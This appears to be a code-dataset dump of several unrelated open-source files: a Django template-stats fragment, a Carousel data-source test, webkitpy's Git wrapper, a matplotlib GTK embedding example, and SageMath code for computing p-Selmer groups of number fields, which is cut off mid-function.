self.record_stats({
'templates': template_context,
'template_dirs': [normpath(x) for x in settings.TEMPLATE_DIRS],
'context_processors': context_processors,
})
| agpl-3.0 | 7,098,565,449,596,766,000 | 40.748252 | 98 | 0.587437 | false |
mikofski/Carousel | carousel/tests/test_data.py | 2 | 5322 | """
Test data sources
"""
from nose.tools import ok_, eq_
from carousel.tests import logging
from carousel.core import UREG
from carousel.core.data_sources import DataSource, DataParameter
from carousel.core.data_readers import XLRDReader
from carousel.tests import PROJ_PATH, TESTS_DIR
import os
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.DEBUG)
TUSCON = os.path.join(PROJ_PATH, 'data', 'Tuscon.json')
XLRDREADER_TESTDATA = os.path.join(TESTS_DIR, 'xlrdreader_testdata.xlsx')
def test_datasource_metaclass():
"""
Test data source meta class.
"""
class DataSourceTest1(DataSource):
"""
Test data source with parameters in file.
"""
class Meta:
data_file = 'pvpower.json'
data_path = os.path.join(PROJ_PATH, 'data')
def __prepare_data__(self):
pass
data_test1 = DataSourceTest1(TUSCON)
ok_(isinstance(data_test1, DataSource))
eq_(data_test1.param_file, os.path.join(PROJ_PATH, 'data', 'pvpower.json'))
class DataSourceTest2(DataSource):
"""
Test data source with parameters in code.
"""
latitude = DataParameter(**{
"description": "latitude",
"units": "degrees",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
longitude = DataParameter(**{
"description": "longitude",
"units": "degrees",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
elevation = DataParameter(**{
"description": "altitude of site above sea level",
"units": "meters",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
timestamp_start = DataParameter(**{
"description": "initial timestamp",
"isconstant": True,
"dtype": "datetime"
})
timestamp_count = DataParameter(**{
"description": "number of timesteps",
"isconstant": True,
"dtype": "int"
})
module = DataParameter(**{
"description": "PV module",
"isconstant": True,
"dtype": "str"
})
inverter = DataParameter(**{
"description": "PV inverter",
"isconstant": True,
"dtype": "str"
})
module_database = DataParameter(**{
"description": "module databases",
"isconstant": True,
"dtype": "str"
})
inverter_database = DataParameter(**{
"description": "inverter database",
"isconstant": True,
"dtype": "str"
})
Tamb = DataParameter(**{
"description": "average yearly ambient air temperature",
"units": "degC",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
Uwind = DataParameter(**{
"description": "average yearly wind speed",
"units": "m/s",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
surface_azimuth = DataParameter(**{
"description": "site rotation",
"units": "degrees",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
timezone = DataParameter(**{
"description": "timezone",
"isconstant": True,
"dtype": "str"
})
def __prepare_data__(self):
pass
data_test2 = DataSourceTest2(TUSCON)
ok_(isinstance(data_test2, DataSource))
for k, val in data_test1.parameters.iteritems():
eq_(data_test2.parameters[k], val)
class DataSourceTest4(DataSource):
"""
Test data source with parameters in file.
"""
latitude = DataParameter(**{
"description": "latitude",
"units": "radians",
"isconstant": True,
"dtype": "float",
"uncertainty": 1.0
})
class Meta:
data_file = 'pvpower.json'
data_path = os.path.join(PROJ_PATH, 'data')
def __prepare_data__(self):
pass
data_test4 = DataSourceTest4(TUSCON)
ok_(isinstance(data_test4, DataSource))
eq_(data_test4['latitude'].u, UREG.radians)
eq_(data_test4.param_file, os.path.join(PROJ_PATH, 'data', 'pvpower.json'))
def test_xlrdreader_datasource():
"""
Test data source with xlrd reader.
"""
class DataSourceTest3(DataSource):
"""
Test data source with xlrd reader and params in file.
"""
class Meta:
data_reader = XLRDReader
data_file = 'xlrdreader_param.json'
data_path = TESTS_DIR
def __prepare_data__(self):
pass
data_test3 = DataSourceTest3(XLRDREADER_TESTDATA)
ok_(isinstance(data_test3, DataSource))
eq_(data_test3._meta.data_reader, XLRDReader)
os.remove(os.path.join(TESTS_DIR, 'xlrdreader_testdata.xlsx.json'))
LOGGER.debug('xlrdreader_testdata.xlsx.json has been cleaned')
if __name__ == '__main__':
test_datasource_metaclass()
test_xlrdreader_datasource()
| bsd-3-clause | -690,172,727,919,426,300 | 28.403315 | 79 | 0.537204 | false |
smishenk/blink-crosswalk | Tools/Scripts/webkitpy/common/checkout/scm/git.py | 27 | 14958 | # Copyright (c) 2009, 2010, 2011 Google Inc. All rights reserved.
# Copyright (c) 2009 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
import logging
import os
import re
from webkitpy.common.checkout.scm.scm import SCM
from webkitpy.common.memoized import memoized
from webkitpy.common.system.executive import Executive, ScriptError
_log = logging.getLogger(__name__)
class AmbiguousCommitError(Exception):
def __init__(self, num_local_commits, has_working_directory_changes):
Exception.__init__(self, "Found %s local commits and the working directory is %s" % (
num_local_commits, ["clean", "not clean"][has_working_directory_changes]))
self.num_local_commits = num_local_commits
self.has_working_directory_changes = has_working_directory_changes
class Git(SCM):
# Git doesn't appear to document error codes, but seems to return
# 1 or 128, mostly.
ERROR_FILE_IS_MISSING = 128
executable_name = 'git'
def __init__(self, cwd, **kwargs):
SCM.__init__(self, cwd, **kwargs)
def _run_git(self, command_args, **kwargs):
full_command_args = [self.executable_name] + command_args
full_kwargs = kwargs
if not 'cwd' in full_kwargs:
full_kwargs['cwd'] = self.checkout_root
return self._run(full_command_args, **full_kwargs)
@classmethod
def in_working_directory(cls, path, executive=None):
try:
executive = executive or Executive()
return executive.run_command([cls.executable_name, 'rev-parse', '--is-inside-work-tree'], cwd=path, error_handler=Executive.ignore_error).rstrip() == "true"
except OSError, e:
# The Windows bots seem to through a WindowsError when git isn't installed.
return False
def find_checkout_root(self, path):
# "git rev-parse --show-cdup" would be another way to get to the root
checkout_root = self._run_git(['rev-parse', '--show-toplevel'], cwd=(path or "./")).strip()
if not self._filesystem.isabs(checkout_root): # Sometimes git returns relative paths
checkout_root = self._filesystem.join(path, checkout_root)
return checkout_root
@classmethod
def read_git_config(cls, key, cwd=None, executive=None):
# FIXME: This should probably use cwd=self.checkout_root.
# Pass --get-all for cases where the config has multiple values
# Pass the cwd if provided so that we can handle the case of running webkit-patch outside of the working directory.
# FIXME: This should use an Executive.
executive = executive or Executive()
return executive.run_command([cls.executable_name, "config", "--get-all", key], error_handler=Executive.ignore_error, cwd=cwd).rstrip('\n')
def _discard_local_commits(self):
self._run_git(['reset', '--hard', self._remote_branch_ref()])
def _local_commits(self, ref='HEAD'):
return self._run_git(['log', '--pretty=oneline', ref + '...' + self._remote_branch_ref()]).splitlines()
def _rebase_in_progress(self):
return self._filesystem.exists(self.absolute_path(self._filesystem.join('.git', 'rebase-apply')))
def has_working_directory_changes(self):
return self._run_git(['diff', 'HEAD', '--no-renames', '--name-only']) != ""
def _discard_working_directory_changes(self):
# Could run git clean here too, but that wouldn't match subversion
self._run_git(['reset', 'HEAD', '--hard'])
# Aborting rebase even though this does not match subversion
if self._rebase_in_progress():
self._run_git(['rebase', '--abort'])
def status_command(self):
# git status returns non-zero when there are changes, so we use git diff name --name-status HEAD instead.
# No file contents printed, thus utf-8 autodecoding in self.run is fine.
return [self.executable_name, "diff", "--name-status", "--no-renames", "HEAD"]
def _status_regexp(self, expected_types):
return '^(?P<status>[%s])\t(?P<filename>.+)$' % expected_types
def add_list(self, paths, return_exit_code=False, recurse=True):
return self._run_git(["add"] + paths, return_exit_code=return_exit_code)
def delete_list(self, paths):
return self._run_git(["rm", "-f"] + paths)
def move(self, origin, destination):
return self._run_git(["mv", "-f", origin, destination])
def exists(self, path):
return_code = self._run_git(["show", "HEAD:%s" % path], return_exit_code=True, decode_output=False)
return return_code != self.ERROR_FILE_IS_MISSING
def _branch_from_ref(self, ref):
return ref.replace('refs/heads/', '')
def current_branch(self):
return self._branch_from_ref(self._run_git(['symbolic-ref', '-q', 'HEAD']).strip())
def _upstream_branch(self):
current_branch = self.current_branch()
return self._branch_from_ref(self.read_git_config('branch.%s.merge' % current_branch, cwd=self.checkout_root, executive=self._executive).strip())
def _merge_base(self, git_commit=None):
if git_commit:
# Rewrite UPSTREAM to the upstream branch
if 'UPSTREAM' in git_commit:
upstream = self._upstream_branch()
if not upstream:
raise ScriptError(message='No upstream/tracking branch set.')
git_commit = git_commit.replace('UPSTREAM', upstream)
# Special-case <refname>.. to include working copy changes, e.g., 'HEAD....' shows only the diffs from HEAD.
if git_commit.endswith('....'):
return git_commit[:-4]
if '..' not in git_commit:
git_commit = git_commit + "^.." + git_commit
return git_commit
return self._remote_merge_base()
def changed_files(self, git_commit=None):
# FIXME: --diff-filter could be used to avoid the "extract_filenames" step.
status_command = [self.executable_name, 'diff', '-r', '--name-status', "--no-renames", "--no-ext-diff", "--full-index", self._merge_base(git_commit)]
# FIXME: I'm not sure we're returning the same set of files that SVN.changed_files is.
# Added (A), Copied (C), Deleted (D), Modified (M), Renamed (R)
return self._run_status_and_extract_filenames(status_command, self._status_regexp("ADM"))
def _added_files(self):
return self._run_status_and_extract_filenames(self.status_command(), self._status_regexp("A"))
def _deleted_files(self):
return self._run_status_and_extract_filenames(self.status_command(), self._status_regexp("D"))
@staticmethod
def supports_local_commits():
return True
def display_name(self):
return "git"
def most_recent_log_matching(self, grep_str, path):
# We use '--grep=' + foo rather than '--grep', foo because
# git 1.7.0.4 (and earlier) didn't support the separate arg.
return self._run_git(['log', '-1', '--grep=' + grep_str, '--date=iso', self.find_checkout_root(path)])
def svn_revision(self, path):
git_log = self.most_recent_log_matching('git-svn-id:', path)
match = re.search("^\s*git-svn-id:.*@(?P<svn_revision>\d+)\ ", git_log, re.MULTILINE)
if not match:
return ""
return str(match.group('svn_revision'))
def timestamp_of_revision(self, path, revision):
git_log = self.most_recent_log_matching('git-svn-id:.*@%s' % revision, path)
match = re.search("^Date:\s*(\d{4})-(\d{2})-(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$", git_log, re.MULTILINE)
if not match:
return ""
# Manually modify the timezone since Git doesn't have an option to show it in UTC.
# Git also truncates milliseconds but we're going to ignore that for now.
time_with_timezone = datetime.datetime(int(match.group(1)), int(match.group(2)), int(match.group(3)),
int(match.group(4)), int(match.group(5)), int(match.group(6)), 0)
sign = 1 if match.group(7) == '+' else -1
time_without_timezone = time_with_timezone - datetime.timedelta(hours=sign * int(match.group(8)), minutes=int(match.group(9)))
return time_without_timezone.strftime('%Y-%m-%dT%H:%M:%SZ')
def _prepend_svn_revision(self, diff):
revision = self._head_svn_revision()
if not revision:
return diff
return "Subversion Revision: " + revision + '\n' + diff
def create_patch(self, git_commit=None, changed_files=None):
"""Returns a byte array (str()) representing the patch file.
Patch files are effectively binary since they may contain
files of multiple different encodings."""
# Put code changes at the top of the patch and layout tests
# at the bottom, this makes for easier reviewing.
config_path = self._filesystem.dirname(self._filesystem.path_to_module('webkitpy.common.config'))
order_file = self._filesystem.join(config_path, 'orderfile')
order = ""
if self._filesystem.exists(order_file):
order = "-O%s" % order_file
command = [self.executable_name, 'diff', '--binary', '--no-color', "--no-ext-diff", "--full-index", "--no-renames", order, self._merge_base(git_commit), "--"]
if changed_files:
command += changed_files
return self._prepend_svn_revision(self._run(command, decode_output=False, cwd=self.checkout_root))
@memoized
def svn_revision_from_git_commit(self, git_commit):
# git svn find-rev always exits 0, even when the revision or commit is not found.
try:
return int(self._run_git(['svn', 'find-rev', git_commit]).rstrip())
except ValueError, e:
return None
def checkout_branch(self, name):
self._run_git(['checkout', '-q', name])
def create_clean_branch(self, name):
self._run_git(['checkout', '-q', '-b', name, self._remote_branch_ref()])
def blame(self, path):
return self._run_git(['blame', path])
# Git-specific methods:
def _branch_ref_exists(self, branch_ref):
return self._run_git(['show-ref', '--quiet', '--verify', branch_ref], return_exit_code=True) == 0
def delete_branch(self, branch_name):
if self._branch_ref_exists('refs/heads/' + branch_name):
self._run_git(['branch', '-D', branch_name])
def _remote_merge_base(self):
return self._run_git(['merge-base', self._remote_branch_ref(), 'HEAD']).strip()
def _remote_branch_ref(self):
# Use references so that we can avoid collisions, e.g. we don't want to operate on refs/heads/trunk if it exists.
remote_branch_refs = self.read_git_config('svn-remote.svn.fetch', cwd=self.checkout_root, executive=self._executive)
if not remote_branch_refs:
remote_master_ref = 'refs/remotes/origin/master'
if not self._branch_ref_exists(remote_master_ref):
raise ScriptError(message="Can't find a branch to diff against. svn-remote.svn.fetch is not in the git config and %s does not exist" % remote_master_ref)
return remote_master_ref
# FIXME: What's the right behavior when there are multiple svn-remotes listed?
# For now, just use the first one.
first_remote_branch_ref = remote_branch_refs.split('\n')[0]
return first_remote_branch_ref.split(':')[1]
def commit_locally_with_message(self, message, commit_all_working_directory_changes=True):
command = ['commit', '-F', '-']
if commit_all_working_directory_changes:
command.insert(1, '--all')
self._run_git(command, input=message)
# These methods are git specific and are meant to provide support for the Git oriented workflow
# that Blink is moving towards, hence there are no equivalent methods in the SVN class.
def pull(self):
self._run_git(['pull'])
def latest_git_commit(self):
return self._run_git(['log', '-1', '--format=%H']).strip()
def git_commits_since(self, commit):
return self._run_git(['log', commit + '..master', '--format=%H', '--reverse']).split()
def git_commit_detail(self, commit, format=None):
args = ['log', '-1', commit]
if format:
args.append('--format=' + format)
return self._run_git(args)
def _branch_tracking_remote_master(self):
origin_info = self._run_git(['remote', 'show', 'origin', '-n'])
match = re.search("^\s*(?P<branch_name>\S+)\s+merges with remote master$", origin_info, re.MULTILINE)
if not match:
raise ScriptError(message="Unable to find local branch tracking origin/master.")
branch = str(match.group("branch_name"))
return self._branch_from_ref(self._run_git(['rev-parse', '--symbolic-full-name', branch]).strip())
def is_cleanly_tracking_remote_master(self):
if self.has_working_directory_changes():
return False
if self.current_branch() != self._branch_tracking_remote_master():
return False
if len(self._local_commits(self._branch_tracking_remote_master())) > 0:
return False
return True
def ensure_cleanly_tracking_remote_master(self):
self._discard_working_directory_changes()
self._run_git(['checkout', '-q', self._branch_tracking_remote_master()])
self._discard_local_commits()
| bsd-3-clause | 8,745,298,033,427,037,000 | 45.74375 | 169 | 0.641195 | false |
yavalvas/yav_com | build/matplotlib/doc/mpl_examples/user_interfaces/embedding_in_gtk2.py | 9 | 1452 | #!/usr/bin/env python
"""
show how to add a matplotlib FigureCanvasGTK or FigureCanvasGTKAgg widget and
a toolbar to a gtk.Window
"""
import gtk
from matplotlib.figure import Figure
from numpy import arange, sin, pi
# uncomment to select /GTK/GTKAgg/GTKCairo
#from matplotlib.backends.backend_gtk import FigureCanvasGTK as FigureCanvas
from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
#from matplotlib.backends.backend_gtkcairo import FigureCanvasGTKCairo as FigureCanvas
# or NavigationToolbar for classic
#from matplotlib.backends.backend_gtk import NavigationToolbar2GTK as NavigationToolbar
from matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar
# implement the default mpl key bindings
from matplotlib.backend_bases import key_press_handler
win = gtk.Window()
win.connect("destroy", lambda x: gtk.main_quit())
win.set_default_size(400,300)
win.set_title("Embedding in GTK")
vbox = gtk.VBox()
win.add(vbox)
fig = Figure(figsize=(5,4), dpi=100)
ax = fig.add_subplot(111)
t = arange(0.0,3.0,0.01)
s = sin(2*pi*t)
ax.plot(t,s)
canvas = FigureCanvas(fig) # a gtk.DrawingArea
vbox.pack_start(canvas)
toolbar = NavigationToolbar(canvas, win)
vbox.pack_start(toolbar, False, False)
def on_key_event(event):
print('you pressed %s'%event.key)
key_press_handler(event, canvas, toolbar)
canvas.mpl_connect('key_press_event', on_key_event)
win.show_all()
gtk.main()
| mit | 1,903,161,130,819,998,200 | 26.923077 | 92 | 0.77686 | false |
JohnCremona/CremonaPacetti | code/KSp.py | 1 | 18244 | # KSp.py: code to compute p-Selmer groups of number fields
#######################################################################
#
# Copyright 2018 John Cremona
#
# This is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this file; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
#
#######################################################################
#
# This file contains SageMath code to compute K(S,p) where
#
# K is a number field
# S is a finite set of primes of K
# p is a prime number
#
# Author: John Cremona (based on code he wrote for Magma originally)
#
# Note: Sage (as of version 8.2) has methods K.selmer_group(S,m) which
# returns a list of generators of K(S,m) with m>0 not necessarily
# prime, together with (optionally) their orders; and also
# K.selmer_group_iterator(S,m) which returns an iterator through all
# elements of K(S,m). But these functions do not implement any
# inverse map taking an element of K^* representing an element of
# K^*/(K^*)^m lying in K(S,m) and returning a vector of its exponenets
# with respect to the generators. We need this and have implemented
# it here. The code here will be submitted to SageMath through
# https://trac.sagemath.org/ticket/16496.
#
# The main function here is pSelmerGroup(). All the preceding ones
# are subsidiary utilities. Some of these are only to allow the same
# code to work over QQ as over any number field.
from sage.all import Matrix, GF, prod, VectorSpace, ProjectiveSpace, QQ, ZZ, Set
def IdealGenerator(I):
r"""Return the generator of a principal ideal.
INPUT:
- ``I`` (fractional ideal or integer) -- either a fractional ideal of a
number field, which must be principal, or a rational integer.
OUTPUT:
A generator of I when I is a principal ideal, else I itself.
"""
try:
return I.gens_reduced()[0]
except AttributeError:
return I
# fractional ideals have no support method, but field elements do
def Support(a):
r"""Return the support (list of prime factors) of a.
INPUT:
- ``a`` (fractional ideal, number field element, or integer) --
either a fractional ideal of a number field, or a nonzero
element of a number field, or a rational integer.
OUTPUT:
The list of prime factors of ``a``. In case ``a`` is a rational
integer this is a list pf prime numbers, otherwise a list of prime
ideals.
"""
try:
return a.support()
except AttributeError:
return a.prime_factors()
def coords_in_C_p(I,C,p):
r"""Return coordinates of the ideal ``I`` with respect to a basis of
the ``p``-torsion of the ideal class group ``C``.
INPUT:
- ``I`` (ideal) -- a fractional ideal of a number field ``K``,
whose ``p``'th power is principal.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
The coordinates of the ideal class `[I]` in the `p`-torsion subgroup `C[p]`.
"""
c = C(I).exponents()
non_p_indices = [i for i,n in enumerate(C.gens_orders()) if not p.divides(n)]
assert all([c[i]==0 for i in non_p_indices])
p_indices = [(i,n//p) for i,n in enumerate(C.gens_orders()) if p.divides(n)]
assert all([c[i]%n==0 for i,n in p_indices])
return [(c[i]//n)%p for i,n in p_indices]
def coords_in_C_mod_p(I,C,p):
r"""Return coordinates of the ideal ``I`` with respect to a basis of
the ``p``-cotorsion of the ideal class group ``C``.
INPUT:
- ``I`` (ideal) -- a fractional ideal of a number field ``K``.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
The coordinates of the ideal class `[I]` in the `p`-cotorsion group `C/C^p`.
"""
c = C(I).exponents()
p_indices = [i for i,n in enumerate(C.gens_orders()) if p.divides(n)]
return [c[i]%p for i in p_indices]
def root_ideal(I,C,p):
r"""Return the ``p``'th root of an ideal with respect to the class group.
INPUT:
- ``I`` (ideal) -- a fractional ideal of a number field ``K``,
whose ideal class is a ``p``'th power.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
An ideal `J` such that `J^p` is in the ideal class `[I]`.
"""
v = C(I).exponents()
# In the line below, e=(vi/p)%n should satisfy p*e=vi (mod n)
w = [vi//p if p.divides(n) else (vi/p)%n for vi,n in zip(v,C.gens_orders())]
return prod([J**wi for wi,J in zip(w,C.gens_ideals())], C.number_field().ideal(1))
def coords_in_U_mod_p(u,U,p):
r"""Return coordinates of a unit ``u`` with respect to a basis of the
``p``-cotorsion of the unit group ``U``.
INPUT:
- ``u`` (algebraic unit) -- a unit in a number field ``K``.
- ``U`` (unit group) -- the unit group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
The coordinates of the ideal class `u` in the `p`-cotorsion group `U/U^p`.
"""
co = U.log(u)
if not p.divides(U.zeta_order()):
co = co[1:]
return [c%p for c in co]
def uniquify(S):
r"""
Return a list of the unique elements of S.
"""
return list(Set(S))
def basis_for_p_cokernel(S,C,p):
r"""Return a basis for the group of ideals supported on S (mod
p-powers) whose class in the class group C is a p'th power,
together with a function which takes the S-exponents of such an
ideal and returns its coordinates on this basis.
INPUT:
- ``S`` (list) -- a list of prime ideals in a number field ``K``.
- ``C`` (class group) -- the ideal class group of ``K``.
- ``p`` (prime) -- a prime number.
OUTPUT:
(tuple) (``b``, ``f``) where
- ``b`` is a list of ideals which is a basis for the group of
ideals supported on ``S`` (modulo ``p``'th powers) whose ideal
class is a ``p``'th power, and
- ``f`` is a function which takes such an ideal and returns its
coordinates with respect to this basis.
"""
M = Matrix(GF(p),[coords_in_C_mod_p(P,C,p) for P in S])
k = M.left_kernel()
bas = [prod([P**bj.lift() for P,bj in zip(S,b.list())],
C.number_field().ideal(1)) for b in k.basis()]
f = lambda v: k.coordinate_vector(v)
return bas,f
def selmer_group_projective(K,S,p):
r"""Return iterator over K(S,p) up to scaling.
INPUT:
- ``K`` (number field) -- a number field, or ``QQ``.
- ``S`` (list) -- a list of prime ideals in ``K``, or primes.
- ``p`` (prime) -- a prime number.
- ``debug`` (boolean, default ``False``) -- debug flag.
OUTPUT:
(iterator) Yields all non-zero elements of `\mathbb{P}(K(S,p))`,
where `K(S,p)` is viewed as a vector space over `GF(p)`. In other
words, yield all non-zero elements of `K(S,p)` up to scaling.
..note::
This could easily be moved into K.selmer_group_iterator(S,p) as
an option.
"""
KSgens = K.selmer_group(S=uniquify(S), m=p)
for ev in ProjectiveSpace(GF(p),len(KSgens)-1):
yield prod([q ** e for q, e in zip(KSgens, list(ev))], K.one())
# The function itself
def pSelmerGroup(K, S, p, debug=False):
r"""Return the ``p,S``-Selmer group of the number field containing the
ideals in ``S``
INPUT:
- ``K`` (number field) -- a number field, or ``QQ``.
- ``S`` (list) -- a list of prime ideals in ``K``.
- ``p`` (prime) -- a prime number.
- ``debug`` (boolean, default ``False``) -- debug flag.
OUTPUT:
(tuple) ``KSp``, ``KSp_gens``, ``from_KSp``, ``to_KSp`` where
- ``KSp`` is an abstract vector space over `GF(p)` isomorphic to `K(S,p)`;
- ``KSp_gens`` is a list of elements of `K^*` generating `K(S,p)`;
- ``from_KSp`` is a function from ``KSp`` to `K^*` implementing
the isomorphism from `K(S,p)` to `K(S,p)` as a subgroup of
`K^*/(K^*)^p`;
- ``to_KSP`` is a partial function from `K^*` to ``KSp`` defined
on elements `a` whose image in `K^*/(K^*)^p` lies in `K(S,p)`,
mapping them via the inverse isomorphism to the abstract vector
space ``KSp``.
"""
# Input check: p and all P in S must be prime. Remove any repeats in S.
S = uniquify(S)
if not all(P.is_prime() for P in S):
raise ValueError("elements of S must all be prime")
if not p.is_prime():
raise ValueError("p must be prime")
F = GF(p)
# Step 1. The unit contribution: all fundamental units, and also the
# generating root of unity if its order is a multiple of p; we just
# take generators of U/U^p. These have valuation 0 everywhere.
hK = K.class_number()
C = K.class_group()
hKp = (hK%p == 0)
if K == QQ:
if p == 2:
ulist = [QQ(-1)]
else:
ulist = []
else:
U = K.unit_group()
ulist = U.gens_values()
if U.zeta_order()%p:
ulist = ulist[1:]
if debug: print("{} generators in ulist = {}".format(len(ulist),ulist))
# Step 2. The class group contribution: generators of the p'th
# powers of ideals generating the p-torsion in the class group.
# These have valuation divisible by p everywhere.
if hKp:
betalist = [IdealGenerator(c**n) for c,n in zip(C.gens_ideals(), C.gens_orders()) if n%p==0]
else:
betalist = []
if debug: print("{} generators in betalist = {}".format(len(betalist),betalist))
# Step 3. The part depending on S: one generator for each ideal A
# in a basis of those ideals supported on S (modulo p'th powers of
# ideals) which is a p'th power in the class group. We find B
# such that A/B^p is principal and take a generator of that, for
# each A in a generating set.
if hK > 1:
T, f = basis_for_p_cokernel(S,C,p)
alphalist = [IdealGenerator(I/root_ideal(I,C,p)**p) for I in T]
else:
f = lambda x:x
alphalist = [IdealGenerator(P) for P in S]
if debug: print("{} generators in alphalist = {}".format(len(alphalist), alphalist))
# Now we have the generators of K(S,p), and define K(S,p) as an
# abstract vector space:
KSp_gens = alphalist + betalist + ulist
if debug: print("Generators of K(S,p) = {} (dimension {})".format(KSp_gens, len(KSp_gens)))
KSp = VectorSpace(GF(p), len(KSp_gens))
# Now we define maps in each direction from the abstract space and K^*.
# Define the easy map from KSp into K^*:
def from_KSp(v):
return prod([g**vi for g,vi in zip(KSp_gens,v)], K(1))
# Define the hard map from (a subgroup of) K^* to KSp:
def to_KSp(a):
# Check that a is in K(S,p):
assert a != 0
assert all(P in S or a.valuation(P)%p==0 for P in a.support())
# 1. (a) is a p'th power mod ideals in S, say (a)=AB^p, where
# A is supported on S and is a linear combination of the
# ideals T above. Find the exponents of the P_i in S in A:
S_vals = [F(a.valuation(P)) for P in S]
avec = list(f(S_vals)) # coordinates of A w.r.t ideals in T (mod p'th powers)
a1 = prod((alpha**e for alpha,e in zip(alphalist,avec)), K(1))
a /= a1
if debug: print("alpha component is {} with coords {}".format(a1,avec))
if debug:
if K==QQ:
print("continuing with quotient {} whose ideal should be a {}'th power: {}".format(a,p,a.factor()))
else:
print("continuing with quotient {} whose ideal should be a {}'th power: {}".format(a,p,K.ideal(a).factor()))
# 2. Now (a) is a p'th power, say (a)=B^p.
# Find B and the exponents of [B] w.r.t. basis of C[p]:
supp = a.support()
vals = [a.valuation(P) for P in supp]
assert all(v%p==0 for v in vals)
if K==QQ:
B = prod((P**(v//p) for P,v in zip(supp,vals)),K(1))
assert B**p == a.abs()
else:
B = prod((P**(v//p) for P,v in zip(supp,vals)),K.ideal(1))
assert B**p == K.ideal(a)
if debug:
print("B={}".format(B))
print("a={}".format(a))
if hKp:
bvec = coords_in_C_p(B,C,p)
a2 = prod((beta**e for beta,e in zip(betalist,bvec)), K(1))
a /= a2
supp = a.support()
vals = [a.valuation(P) for P in supp]
assert all(v%p==0 for v in vals)
B = prod((P**(v//p) for P,v in zip(supp,vals)),K.ideal(1))
assert B**p == K.ideal(a)
else:
bvec = []
a2 = 1
if debug: print("beta component is {} with coords {}".format(a2,bvec))
if debug: print("continuing with quotient {} which should be a p'th power times a unit".format(a))
# 3. Now (a) = (c)^p for some c, so a/c^p is a unit
if K!=QQ:
assert B.is_principal()
if debug: print("B={}".format(B))
a3 = B if K==QQ else IdealGenerator(B)
if debug: print("a3={}".format(a3))
a /= a3**p
if debug: print("dividing by {}th power of {}".format(p,a3))
if debug: print("continuing with quotient {} which should be a unit".format(a))
#4. Now a is a unit
# NB not a.is_unit which is true for all a in K^*. One could
# also test K.ring_of_integers()(a).is_unit().
if K==QQ:
assert a.abs()==1
else:
assert K.ideal(a).is_one()
if K == QQ:
if p == 2:
cvec = [1] if a == -1 else [0]
else:
cvec = []
else:
cvec = coords_in_U_mod_p(a,U,p)
if debug: print("gamma component has coords {}".format(cvec))
return KSp(avec + bvec + cvec);
return KSp, KSp_gens, from_KSp, to_KSp
"""Notes on computing the map to_KSp:
Given a in K(S,p):
(1) Write the principal ideal (a) in the form AB^p with A supported by
S and p'th power free.
Set IS = group of ideals spanned by S mod p'th powers, and
ISP=subgroup of that which map to 0 in C/C^p.
(2) Convert A to an element of ISP, hence find the coordinates of a
with respect to the generators in alphalist.
(3) Dividing out by that, now (a)=B^p (with a different B).
Write the ideal class [B], shose p'th power is trivial, in terms of
the generators of C[p]; then B=B1*(b) where the coefficients of B1
with respect to generators of Cl[p] give the coordinates of the result
with respect to the generators in betalist.
(4) Dividing out by that, and by b^p, we have (a)=(1), so a is a unit.
Now a can be expressed in terms of the unit generators (fundamental
units and, if necessary, a root of unity.
"""
# Over QQ we can do x.is_S_unit(S) when x is an element but not an
# ideal; over other number fields only ideals have the method, not
# elements!
def is_S_unit(a, S):
r"""Returns True iff a is an S-unit where a is in Q or in a number
field K and S is a list of primes of K.
INPUT:
- ``a`` (integer, rational or number field element or ideal) --
any integer or rational number, or number field element, or
fractional ideal.
- ``S`` (list) -- list of prime numbers or prime ideals
OUTPUT:
(boolean) ``True`` if and only if ``a`` is an ``S``-unit.
"""
K = a.parent()
# rationals have an is_S_unit method:
if K in [ZZ,QQ]:
return QQ(a).is_S_unit(S)
# fractional ideals also have such a method:
try:
return a.is_S_unit(S)
